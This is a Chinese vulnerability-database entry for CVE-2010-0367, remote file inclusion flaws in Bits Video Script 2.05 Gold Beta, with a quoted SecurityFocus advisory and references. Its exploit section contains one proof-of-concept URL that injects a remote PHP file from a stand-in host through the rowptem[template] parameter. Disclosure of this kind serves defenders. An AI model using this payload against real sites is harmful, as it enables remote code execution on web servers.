BitScripts Bits 视频脚本 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118924 漏洞类型 代码注入
发布时间 2010-01-18 更新时间 2010-01-18
CVE编号 CVE-2010-0367 CNNVD-ID CNNVD-201001-218
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/34116
https://www.securityfocus.com/bid/40709
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201001-218
|漏洞详情
BitScriptsBits视频脚本2.05GoldBeta,以及可能的2.04版本中存在多个PHP远程文件包含漏洞,远程攻击者可以借助(1)showcasesearch.php和(2)showcase2search.php的rowptem[template]参数中的一个URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/40709/info

Bits Video Script is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

Bits Video Script 2.05 Gold Beta is vulnerable; other versions may also be affected. 

http://www.example.com/Video/showcasesearch.php?rowptem[template]=http://www.example.net/c.txt?
|受影响的产品
BitScripts Bits Video Script 2.05 Gold Beta
|参考资料

来源:XF
名称:bitsvideo-showcasesearch-file-include(55740)
链接:http://xforce.iss.net/xforce/xfdb/55740
来源:MISC
链接:http://www.packetstormsecurity.com/1001-exploits/bitsvs-xssuploadrfi.txt